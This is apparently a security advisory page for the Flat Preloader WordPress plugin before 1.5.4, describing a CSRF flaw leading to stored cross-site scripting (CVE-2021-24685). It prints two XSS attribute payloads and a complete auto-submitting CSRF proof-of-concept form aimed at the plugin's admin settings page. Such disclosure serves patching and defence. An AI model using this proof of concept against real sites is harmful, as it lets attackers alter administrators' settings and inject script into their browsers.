Lucene search
Apple502jWPEX-ID:972ECDE8-3D44-4DD9-81E3-643D8737434FHistorySep 28, 2021 - 12:00 a.m.
Flat Preloader < 1.5.4 - CSRF to Stored Cross-Site Scripting
2021-09-2800:00:00
apple502j
319
0.001 Low
EPSS
Percentile
33.4%
The plugin does not enforce nonce checks when saving its settings, as well as does not sanitise and escape them, which could allow attackers to a make logged in admin change them with a Cross-Site Scripting payload (triggered either in the frontend or backend depending on the payload) The CSRF was fixed in 1.5.1, however further sanitisation was done in v1.5.2 to 1.5.4
Depending on the payload, the XSS will be triggered either in the frontend or backend:
Frontend: " onload=alert(/XSS/)//
Backend: " style=animation-name:rotation onanimationstart=alert(/XSS/)//
<form action="https://example.com/wp-admin/options-general.php?page=flat-preloader" method="post" id="csrf">
<input type="hidden" name="preloader-style" value="windows-10/circles-menu-1.gif">
<input type="hidden" name="preloader-display" value="all">
<input type="hidden" name="preloader[custom_image_url]" value="">
<input type="hidden" name="preloader[text_under_icon]" value="">
<input type="hidden" name="preloader[delay_time]" value="">
<input type="hidden" name="preloader[alt]" value='PAYLOAD'>
<input type="hidden" name="save-option" value="Save Changes">
</form>
<script>csrf.submit()</script>Related
wpvulndb
wpvulndb
Flat Preloader < 1.5.4 - CSRF to Stored Cross-Site Scripting
2021-09-28 00:00:00
prion
prion
Cross site scripting
2021-11-01 09:15:00
nvd
nvd
CVE-2021-24685
2021-11-01 09:15:08
cve
cve
CVE-2021-24685
2021-11-01 09:15:08
cvelist
cvelist
CVE-2021-24685 Flat Preloader < 1.5.4 - CSRF to Stored Cross-Site Scripting
2021-11-01 08:46:06